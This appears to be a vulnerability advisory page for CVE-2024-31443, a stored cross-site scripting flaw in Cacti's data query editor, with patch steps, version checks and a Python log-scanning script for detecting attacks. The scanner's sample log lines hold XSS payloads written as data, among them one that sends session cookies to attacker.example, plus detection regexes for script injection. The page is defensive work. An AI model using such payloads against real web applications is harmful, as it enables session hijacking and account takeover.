CVE-2024-31443

5.7 MEDIUM

📋 TL;DR

CVE-2024-31443 is a cross-site scripting (XSS) vulnerability in Cacti's data query functionality: values submitted to form_save() in data_queries.php are accepted without adequate sanitization and later rendered into pages unencoded, so an authenticated user who can edit data queries can plant a script that runs in the browser of anyone who views the affected page. All Cacti releases before 1.2.27 are affected.

💻 Affected Systems

Products:
  • Cacti
Versions: All versions prior to 1.2.27
Operating Systems: All platforms running Cacti
Default Config Vulnerable: ⚠️ Yes
Notes: Exploitation requires an authenticated account with rights to create or edit data queries; the payload then fires in the browsers of other users who view the affected page.

📦 What is this software?

Cacti is an open-source network monitoring and graphing framework built around RRDtool: it polls devices (typically over SNMP), stores the results and renders graphs through a PHP web console. Data queries are the templates that tell the poller which indexed data (interfaces, disks and so on) to collect from a device; they are managed through data_queries.php.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal session cookies, perform actions as authenticated users, or redirect users to malicious sites, potentially leading to full account compromise.

🟠

Likely Case

Attackers inject malicious JavaScript to steal session cookies or credentials from authenticated users viewing vulnerable pages.

🟢

If Mitigated

With output encoding in place (the 1.2.27 fix), injected markup is rendered as inert text instead of executing. On an unpatched host, access restrictions and a Content Security Policy reduce the impact to script execution in the browsers of the few users who can reach the page, and only after one of them views it.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires an authenticated account that can reach the data query editor; no unauthenticated path is known. The flaw is in form_save() in data_queries.php, which stores the submitted fields without adequate sanitization; the stored values are later rendered without encoding, so the payload fires whenever a user views the page, with no further action needed from the attacker.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.2.27

Vendor Advisory: https://github.com/Cacti/cacti/security/advisories/GHSA-rqc8-78cm-85j3

Restart Required: No

Instructions:

1. Back up the Cacti web root (including include/config.php and the plugins directory) and dump the cacti database.
2. Download Cacti 1.2.27 or later from the official repository (https://github.com/Cacti/cacti/releases).
3. Unpack the new release over the existing web root, or into a fresh directory, and carry over include/config.php, rra/, scripts/, resource/ and any custom plugins; do not copy the old PHP files (data_queries.php included) back in.
4. Open the Cacti web interface: the upgrade wizard runs the database migration for the new release. No web server restart is needed.
5. Confirm the version shown on the About page reads 1.2.27 or later.

🔧 Temporary Workarounds

Input Validation Enhancement

Applies to: all

Add server-side validation and output encoding for the data query fields handled by form_save() in data_queries.php. This amounts to hand-applying the upstream fix; if you go this route, diff against commit f946fa537d19678f938ddbd784a10e3290d275cf rather than improvising, and treat it as a stopgap until 1.2.27 is deployed.

WAF Rule Implementation

Applies to: all

Deploy web application firewall rules that inspect POST requests to data_queries.php for script tags, javascript: URIs and on*= event handlers. The fields travel in the request body, not the query string, so the rule set must decode and inspect bodies (including URL-encoded and double-encoded forms); a rule that only looks at the URL will miss the payload.

🧯 If You Can't Patch

  • Exploitation needs an authenticated account that can edit data queries, so restrict the Cacti console to trusted networks (VPN, admin VLAN) and remove data query editing rights from accounts that do not need them.
  • Add a Content Security Policy header to limit what an injected script can do. Test it first: Cacti pages use inline scripts, so a strict script-src without 'unsafe-inline' can break the interface, while a policy that allows 'unsafe-inline' gives little protection against this bug.

🔍 How to Verify

Check if Vulnerable:

Read the version from the About page in the Cacti console, or from the files on disk. On 1.2.x the version is set in include/global.php (key cacti_version); some 1.2.x releases keep it as a bare string in include/cacti_version and read it from there, so check both:

grep -n "cacti_version" /path/to/cacti/include/global.php
cat /path/to/cacti/include/cacti_version 2>/dev/null

Check Version:

The database records the version the schema was last upgraded to, which catches a web root that was replaced without running the upgrade wizard:

mysql -u cacti -p cacti -e "SELECT cacti FROM version;"

Anything below 1.2.27 (including 1.2.27 pre-releases) is affected.

Verify Fix Applied:

Confirm that the About page, the files and the database all report 1.2.27 or higher. For a git checkout you can also confirm the fix commit is an ancestor of the deployed revision:

git -C /path/to/cacti merge-base --is-ancestor f946fa537d19678f938ddbd784a10e3290d275cf HEAD && echo "fix present"

Tarball installs carry no git history, so for those the version number is the only check.
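The version checks above, as an added example (this is not code from the page or from the Cacti project). It reads the version out of either file form described above and compares it against 1.2.27, treating pre-release builds of 1.2.27 as still vulnerable. The file layout it expects (a quoted $config['cacti_version'] assignment in global.php, or a bare version string in include/cacti_version) is an assumption, and the sample file contents are constructed.

```python
"""Version check for CVE-2024-31443 (fixed in Cacti 1.2.27)."""
import re
import sys

# First release carrying the fix (vendor advisory GHSA-rqc8-78cm-85j3).
FIXED_VERSION = "1.2.27"

# Two places the version can be read from on a 1.2.x install (assumption about
# the exact file layout; adjust if your tree differs):
#   include/global.php     -> $config['cacti_version'] = '1.2.26';
#   include/cacti_version  -> a bare version string on one line
_ASSIGN_RE = re.compile(r"""cacti_version['"]\]\s*=\s*['"]([0-9][0-9A-Za-z.-]*)['"]""")
_BARE_RE = re.compile(r"^\s*([0-9]+(?:\.[0-9]+)+[0-9A-Za-z.-]*)\s*$", re.MULTILINE)


def parse_cacti_version(text):
    """Return the version string found in file contents, or None if absent."""
    m = _ASSIGN_RE.search(text) or _BARE_RE.search(text)
    return m.group(1) if m else None


def version_key(version):
    """Map '1.2.27' or '1.2.27-beta1' to a sortable tuple.

    Numeric parts are padded to four positions so tuples always compare
    int-to-int. A pre-release suffix (anything after '-') sorts below the
    final release, so 1.2.27-beta1 < 1.2.27 and is still vulnerable.
    """
    core, _, suffix = version.partition("-")
    numbers = tuple(int(p) for p in re.findall(r"\d+", core))
    numbers = (numbers + (0, 0, 0, 0))[:4]
    return numbers + ((0, suffix) if suffix else (1, ""))


def is_vulnerable(version):
    """True when the installed version predates the fix."""
    return version_key(version) < version_key(FIXED_VERSION)


def check_file(path):
    """Read a global.php or cacti_version file; return (version, vulnerable)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        version = parse_cacti_version(fh.read())
    if version is None:
        raise ValueError(f"no Cacti version found in {path}")
    return version, is_vulnerable(version)


# Constructed sample contents standing in for the real files.
SAMPLE_GLOBAL_PHP = "<?php\n/* constructed sample */\n$config['cacti_version'] = '1.2.26';\n"
SAMPLE_VERSION_FILE = "1.2.28\n"

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path in sys.argv[1:]:
            version, vuln = check_file(path)
            print(f"{path}: Cacti {version} -> {'VULNERABLE' if vuln else 'patched'}")
    else:
        for label, text in (("global.php", SAMPLE_GLOBAL_PHP), ("cacti_version", SAMPLE_VERSION_FILE)):
            v = parse_cacti_version(text)
            print(f"sample {label}: {v} -> {'VULNERABLE' if is_vulnerable(v) else 'patched'}")
```

Run it with the real paths (python3 check.py /path/to/cacti/include/global.php /path/to/cacti/include/cacti_version) or with no arguments to see the constructed samples; a global.php that only references the cacti_version file yields no version, which is why both files are worth passing.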

📡 Detection & Monitoring

Log Indicators:

  • POST requests to data_queries.php whose form fields contain script tags, javascript: URIs or on*= event handlers. The fields travel in the request body, which a standard access log does not record; request-body logging on the reverse proxy or a WAF audit log is needed to see them.
  • A data query edit shortly after a burst of failed logins against the same account, since the attacker needs a valid session first.

Network Indicators:

  • Requests to data_queries.php carrying markup or URL-encoded markup (%3Cscript%3E and similar) in parameters.
  • Operators' browsers reaching out to unfamiliar hosts immediately after loading a Cacti page, particularly with cookie-like strings in the URL. The injected script runs in the victim's browser, not on the Cacti server, so that is where exfiltration traffic originates.

SIEM Query:

Splunk-style query; the field names assume a parser that exposes the request path, method and logged request body as uri_path, method and request_body (adjust to your schema):

source="cacti_access.log" uri_path="*data_queries.php" method="POST"
| regex request_body="(?i)(<script|%3Cscript|javascript:|on[a-z]+\s*=)"
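The same detection logic run over sample log lines, as an added example that is not part of this page or of the Cacti project. It assumes an nginx combined log format with the request body appended as a final quoted field (the $request_body variable), since a plain access log never shows the POST body; the log lines, hosts, user names, parameter names and payloads are all constructed.

```python
"""Scan web-server log lines for XSS-style payloads aimed at data_queries.php."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed log lines. Format assumed: nginx combined format plus "$request_body"
# as a trailing quoted field. A plain access log only records the request line,
# so the POST body carrying the data query fields would never appear in it.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - admin [02/Apr/2024:10:14:02 +0000] "GET /cacti/data_queries.php?action=edit&id=1 HTTP/1.1" 200 18342 "https://cacti.example.internal/cacti/data_queries.php" "Mozilla/5.0" "-"',
    '10.0.0.9 - admin [02/Apr/2024:10:15:31 +0000] "POST /cacti/data_queries.php HTTP/1.1" 302 0 "https://cacti.example.internal/cacti/data_queries.php?action=edit&id=1" "Mozilla/5.0" "action=save&id=1&name=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fattacker.example%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E&description=x&save_component_data_query=1"',
    '10.0.0.9 - admin [02/Apr/2024:10:16:10 +0000] "POST /cacti/data_queries.php HTTP/1.1" 302 0 "https://cacti.example.internal/cacti/data_queries.php?action=edit&id=2" "Mozilla/5.0" "action=save&id=2&name=Interface+Statistics&description=SNMP+interfaces&save_component_data_query=1"',
    '10.0.0.12 - operator [02/Apr/2024:10:17:45 +0000] "POST /cacti/data_queries.php HTTP/1.1" 302 0 "https://cacti.example.internal/cacti/data_queries.php?action=edit&id=3" "Mozilla/5.0" "action=save&id=3&name=Disk&description=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(1)%3E&save_component_data_query=1"',
    '10.0.0.7 - - [02/Apr/2024:10:18:00 +0000] "GET /cacti/graph_view.php?action=tree HTTP/1.1" 200 9011 "-" "Mozilla/5.0" "-"',
    '10.0.0.12 - operator [02/Apr/2024:10:19:12 +0000] "POST /cacti/data_queries.php HTTP/1.1" 302 0 "-" "curl/8.4.0" "action=save&id=3&name=%253Cscript%253Ealert(document.domain)%253C%252Fscript%253E&save_component_data_query=1"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \d+ '
    r'"[^"]*" "[^"]*"(?: "(?P<body>.*)")?$'
)

# Markup and event-handler fragments that have no business in a data query name
# or description. Deliberately broad; tune for your own naming conventions.
XSS_RE = re.compile(
    r"(?i)(<\s*script|javascript\s*:|<\s*(?:img|svg|iframe|object|embed|body)\b|\bon[a-z]+\s*=)"
)


def request_params(uri, body):
    """Merge query-string and form-body parameters into {name: [values]}."""
    params = parse_qs(urlsplit(uri).query, keep_blank_values=True)
    for name, values in parse_qs(body, keep_blank_values=True).items():
        params.setdefault(name, []).extend(values)
    return params


def scan_lines(lines):
    """Return one finding per suspicious parameter value sent to data_queries.php."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        if not urlsplit(m["uri"]).path.endswith("/data_queries.php"):
            continue
        body = m["body"] if m["body"] not in (None, "-") else ""
        for name, values in request_params(m["uri"], body).items():
            for value in values:
                # parse_qs already decoded once; checking a second decode as well
                # catches double-encoded payloads (%253Cscript%253E) without
                # mangling '+' characters in legitimately single-encoded values.
                for candidate in (value, unquote(value)):
                    hit = XSS_RE.search(candidate)
                    if hit:
                        findings.append({
                            "ip": m["ip"], "user": m["user"], "time": m["ts"],
                            "method": m["method"], "param": name,
                            "matched": hit.group(0), "value": candidate[:120],
                        })
                        break
    return findings


if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LOG_LINES):
        print(f"{f['time']} {f['ip']} user={f['user']} {f['method']} param={f['param']} matched={f['matched']!r}")
```

Feed it real lines with scan_lines(open(path)) once body logging is in place; the on[a-z]+= pattern is intentionally loose and will flag innocent values such as "one=1", so review hits rather than alerting on them blindly.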

🔗 References

  • Vendor advisory: https://github.com/Cacti/cacti/security/advisories/GHSA-rqc8-78cm-85j3
  • Fix commit: https://github.com/Cacti/cacti/commit/f946fa537d19678f938ddbd784a10e3290d275cf
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2024-31443
